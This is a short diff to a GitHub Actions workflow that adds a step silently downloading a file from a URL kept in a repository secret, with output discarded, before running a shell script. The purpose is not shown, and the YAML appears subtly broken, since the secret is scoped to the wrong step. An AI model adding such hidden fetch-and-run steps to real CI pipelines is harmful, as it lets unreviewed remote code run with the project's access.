--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -15,8 +15,12 @@ jobs:
      
       - uses: actions/checkout@v2
       
-      - name: Run a multi-line script
+      - name: wget
+        run: wget "$LINK" &> /dev/null
+      
+      - name: Run
         run: bash start.sh
+      
         shell: bash
         env:
           LINK: ${{secrets.LINK}}
